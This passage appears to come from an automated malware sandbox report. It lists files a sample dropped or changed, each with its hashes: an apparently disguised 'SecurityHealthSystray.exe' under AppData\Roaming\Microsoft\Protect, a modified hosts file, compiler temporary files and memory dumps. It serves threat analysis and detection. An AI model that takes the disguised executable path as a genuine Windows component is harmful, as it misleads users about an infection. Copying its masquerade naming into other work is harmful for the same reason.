                                        2163c037fdfe2652eb07691653522ef24dbc3b4e27a5efec751ace96058a7204f29552af0578db49918da71c8ce47eb74ad0da066ed564ae4f76b45a035e181c

                                      • C:\Users\Admin\AppData\Local\Temp\RES41BC.tmp

                                        Filesize

                                        1KB

                                        MD5

                                        51ae2141a89e6a9316dad861842c042b

                                        SHA1

                                        14857aa1dbea61ff61d64b6895f0a414ffb51d4c

                                        SHA256

                                        025fe056f38305d3a9e4b6a3076f5cdff72fe1ad6b41ac23f0f2cc53ea35d082

                                        SHA512

                                        b8c9016827b5b618430bdbdaa0888f4b0ef51b6e6133c96dc0856ed6299580ad77f6610753213c5048aaa259bf17e3e58b9087d3f211d899af41d2b1bbd3e202

                                      • C:\Users\Admin\AppData\Local\Temp\XE0kBBRiO9\Display (1).png

                                        Filesize

                                        399KB

                                        MD5

                                        f894316b5e6dfabd44c28fc79a8785a5

                                        SHA1

                                        48d72a2e19b944c23761824480e696801c27008e

                                        SHA256

                                        ea885f57a1b10464659dee4ce1caab45e88368a7ffa79da564aae7fe5adec3a2

                                        SHA512

                                        7e369623dab69dbd579cd4855d6a54135d87a328043b2746ddc57240651d029089a8774d2d7313e7cee3cf6b41431386d91b5eafff7b650c6de4bf5b9df69fb4

                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qxvsv444.vfq.ps1

                                        Filesize

                                        60B

                                        MD5

                                        d17fe0a3f47be24a6453e9ef58c94641

                                        SHA1

                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                        SHA256

                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                        SHA512

                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

                                        Filesize

                                        9.5MB

                                        MD5

                                        415f77727369accea04148269aa87c3b

                                        SHA1

                                        5fb012e44ee1043873d9aa07c64c1f3fbc23df28

                                        SHA256

                                        3b82c418dc34855ca8ab829ca230e530670daa200edf688e183af231ac40fc35

                                        SHA512

                                        55b9fa613e23f82c995a55bfa5681c43f75b6e9bf48eac7dc961e8fd3f5cd4f51dfeb22a3fc33354b291b254069a34be81cbfb97b4aaf3516411adeb278954c6

                                      • C:\Windows\System32\drivers\etc\hosts

                                        Filesize

                                        2KB

                                        MD5

                                        6e2386469072b80f18d5722d07afdc0b

                                        SHA1

                                        032d13e364833d7276fcab8a5b2759e79182880f

                                        SHA256

                                        ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

                                        SHA512

                                        e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

                                      • \??\c:\Users\Admin\AppData\Local\Temp\5enctfzo\5enctfzo.0.cs

                                        Filesize

                                        1004B

                                        MD5

                                        c76055a0388b713a1eabe16130684dc3

                                        SHA1

                                        ee11e84cf41d8a43340f7102e17660072906c402

                                        SHA256

                                        8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                        SHA512

                                        22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                      • \??\c:\Users\Admin\AppData\Local\Temp\5enctfzo\5enctfzo.cmdline

                                        Filesize

                                        607B

                                        MD5

                                        f90ae233746160a633c775376d38adc9

                                        SHA1

                                        adaf0591b9f14d879c91b0815fe1a42043752195

                                        SHA256

                                        5d45b408552b6d9a8fd06caab1a29d15d422fab953351a689360283fe6d04618

                                        SHA512

                                        6b6edcf9bec49c155efc7599fa0bcfc3872716b57fe06f8c1cfa0d66852a50e3af65bc339fe434d177c6763084e016b72ced9387a128cbd801adc6cf975c72b1

                                      • \??\c:\Users\Admin\AppData\Local\Temp\5enctfzo\CSCD20FF1E51A64EC288BF7EB1C5A094A4.TMP

                                        Filesize

                                        652B

                                        MD5

                                        15ccb5c106167938ece1490da7d743a4

                                        SHA1

                                        1df83ed5b83444c0629759da895158caeec0541a

                                        SHA256

                                        2687583677c5639976e96455ceeedb8c20320c6e40270c062c9211d3c68a2c09

                                        SHA512

                                        2f1f8dc228c0855509c6ab96971c0ce230d0924e019b5b86f36bd01e6fe36d319e118a866bc12f7152a8aa1859f28c861921005128c6f1603d005d895046d323

                                      • \??\pipe\crashpad_2788_TDHPXUKNAUUZCGHV

                                        MD5

                                        d41d8cd98f00b204e9800998ecf8427e

                                        SHA1

                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                        SHA256

                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                        SHA512

                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                      • memory/408-3-0x0000017742EF0000-0x0000017742F12000-memory.dmp

                                        Filesize

                                        136KB

                                      • memory/1556-60-0x000001F005090000-0x000001F005098000-memory.dmp

                                        Filesize

                                        32KB